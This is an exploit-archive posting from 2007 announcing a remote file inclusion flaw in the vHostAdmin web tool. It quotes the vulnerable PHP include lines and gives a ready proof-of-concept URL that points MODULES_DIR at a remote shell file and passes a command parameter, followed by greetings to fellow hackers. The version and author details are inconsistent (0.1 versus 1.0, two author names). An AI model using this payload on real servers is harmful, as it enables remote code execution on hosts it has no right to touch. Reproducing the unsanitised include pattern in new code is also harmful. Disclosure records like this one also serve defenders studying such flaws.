[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability
# Published : 2007-01-24
# Author : 3l3ctric-Cracker
# Previous Title : ASP NEWS <= v3 (news_detail.asp) Remote SQL Injection Vulnerability
# Next Title : Xero Portal (phpbb_root_path) Remote File Include Vulnerablity
_________________________________
________| |________
| Dr Max Virus | /
| | /
/ |_________________________________|
/___________) (___________
------------------------------------------------------------------------------------------------------------------------
Script:vHostAdmin
Affected Version:1.0
Risk:Highly Critical
Downlaoad:http://www.inter7.com/vhostadmin/vhostadmin-cvs-1112134662.tar.gz
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (modules/mail/main.php)
Vul Code;
require_once($MODULES_DIR . '/mail/domains.php');
require_once($MODULES_DIR . '/mail/users.php');
require_once($MODULES_DIR . '/mail/forwards.php');
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/modules/mail/main.php?MODULES_DIR=shell.txt?&cmd=0wn3d
By Dr Max Virus;
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------
# www.Syue.com [2007-01-24]